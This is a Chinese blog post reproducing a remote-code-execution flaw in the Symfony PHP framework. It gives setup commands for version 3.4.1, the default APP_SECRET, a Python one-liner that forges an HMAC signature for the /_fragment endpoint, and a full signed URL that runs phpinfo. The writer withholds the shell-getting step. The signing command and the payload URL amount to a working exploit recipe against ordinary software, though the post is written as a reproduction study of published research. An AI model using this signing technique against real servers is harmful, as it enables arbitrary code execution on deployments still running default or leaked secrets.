不知几DAY的Symfony---RCE复现

简介: Symfony是一个开源的PHP Web框架,它现在是许多知名 CMS 的核心组件,例如Drupal、Joomla! 此文演示了该框架存在的一个RCE漏洞

感谢红队大佬老流氓的供稿,此篇文章是针对Symfony框架的一个RCE漏洞复现

框架简介

Symfony是一个开源的PHP Web框架,它现在是许多知名 CMS 的核心组件,例如Drupal、Joomla!、eZPlatform(以前称为 eZPublish)或Bolt。该框架在低版本时使用了默认密钥,从而造成RCE。

Symfony  的内置功能之一是类,用于处理ESI(Edge-Side Includes)。本质上,当有人向发出请求时,此侦听器会根据给定的 GET  参数设置请求属性。由于这允许运行任意 PHP 代码(稍后会详细介绍),因此必须使用 HMAC 值对请求进行签名。此 HMAC  的秘密加密密钥存储在名为的 Symfony 配置值下。

FragmentListener/_fragmentsecret


漏洞前提

版本高的时候攻击者需要拿到密钥(从文件备份等获取),低版本时为默认密钥(本地安装获即可得)。


环境安装

这里使用的是ubuntu16,安装的是Symfony 3.4.1,命令大致如下

sudo apt update

sudo apt install php-cli unzip

sudo apt-get update

sudo apt-get install php php-xml php-curl php-cli php-zip php-gd php-mysql

sudo apt-get install php php-xml php-curl php-cli php-zip php-gd php-mysql -y

composer create-project symfony/framework-standard-edition my_project_name 3.4.1

apt install composer -y

composer create-project symfony/framework-standard-edition my_project_name 3.4.1

sudo apt-get install --reinstall ca-certificates

composer create-project symfony/framework-standard-edition my_project_name 3.4.1

sudo apt update

sudo apt install php-cli unzip

php -r "copy('https://getcomposer.org/installer', 'composer-setup.php');"

php composer-setup.php --install-dir=/usr/local/bin --filename=composer

php -r "unlink('composer-setup.php');"

composer create-project symfony/framework-standard-edition my_project_name 3.4.1

cd my_project_name

composer install

sudo chmod +x bin/console


启动环境

php bin/console server:run 0.0.0.0:8000        在本机的8000端口开启监听

图片.png

图片.png

漏洞复现

密钥: APP_SECRET is ThisTokenIsNotSoSecretChangeIt        安装的时候可以看见


生成签名,执行phpinfo函数

page="http://xx.xx.xx.xx:8000/_fragment?_path=_controller%3Dphpinfo%26what%3D-1"

python  -c "import base64, hmac, hashlib;  print(base64.b64encode(hmac.HMAC(b'ThisTokenIsNotSoSecretChangeIt',  b'$page', hashlib.sha256).digest()))"

图片.png

拼接路径

注意如果生成的签名里面有+号等特殊符号需要进行url编码,完整url如下:

http://xx.xx.xx.xx:8000/_fragment?_path=_controller%3Dphpinfo%26what%3D-1&_hash=1AojZEyRdQcbIw/hIIukPuOfCbj8tuYrKg0sCPJBWDE=


图片.png

Getshell部分就不发了,那个就是佬的辛勤研究成果了,请大家给老流氓点赞

复现难点

如何获取每个函数的使用方法、寻找可getshell的函数。注意编码问题,如果访问拼接的url提示403则签名有问题,可能是有符号没有编码或函数参数有问题


参考文章

https://www.ambionics.io/blog/symfony-secret-fragment

https://medium.com/@bxrowski0x/3-symfony-rce-a-peek-behind-the-curtain-83da5433e149


相关文章
|
12月前
|
安全 Java 开发者
刚折腾完Log4J,又爆Spring RCE核弹级漏洞
继Log4J爆出安全漏洞之后,又在深夜,Spring的github上又更新了一条可能造成RCE(远程命令执行漏洞)的问题代码,随即在国内的安全圈炸开了锅。有安全专家建议升级到JDK 9以上,有些专家又建议回滚到JDK 7以下,一时间小伙伴们不知道该怎么办了。大家来看一段动画演示,怎么改都是“将军"。
106 1
|
3月前
|
安全 网络安全 数据安全/隐私保护
|
3月前
|
SQL JavaScript 前端开发
阿萨聊测试 ZAP4:如何用ZAP 做Fuzz测试?
阿萨聊测试 ZAP4:如何用ZAP 做Fuzz测试?
阿萨聊测试 ZAP4:如何用ZAP 做Fuzz测试?
|
3月前
|
数据采集 测试技术 网络安全
阿萨聊测试 ZAP3:如何测试HTTPS的Web网站?
阿萨聊测试 ZAP3:如何测试HTTPS的Web网站?
116 0
阿萨聊测试 ZAP3:如何测试HTTPS的Web网站?
|
SQL 安全 数据库
WordPress插件中的流行的严重错误发布的PoC漏洞
WordPress插件中的流行的严重错误发布的PoC漏洞
|
开发框架 安全 JavaScript
记一次web登录通杀渗透测试到GETSHELL——续篇
记一次web登录通杀渗透测试到GETSHELL——续篇
174 0
|
安全 PHP
pikachu靶场通过秘籍之PHP反序列化漏洞攻击
pikachu靶场通过秘籍之PHP反序列化漏洞攻击
162 0
|
机器学习/深度学习 安全 网络协议
SSRF漏洞 实战演示超详细讲解
通过SSRF漏洞的学习,我发现SSRF漏洞果然比CSRF漏洞的利用的局限性要小,并且SSRF漏洞对内网的一些应用危害比较大。所以在开发过程中,警惕大家要尽量避免产生SSRF漏洞。
|
安全 PHP
[PiKaChu靶场通关]RCE远程代码执行(下)
[PiKaChu靶场通关]RCE远程代码执行
143 0
[PiKaChu靶场通关]RCE远程代码执行(下)
|
运维 安全 前端开发
[PiKaChu靶场通关]RCE远程代码执行(上)
[PiKaChu靶场通关]RCE远程代码执行
386 0
[PiKaChu靶场通关]RCE远程代码执行(上)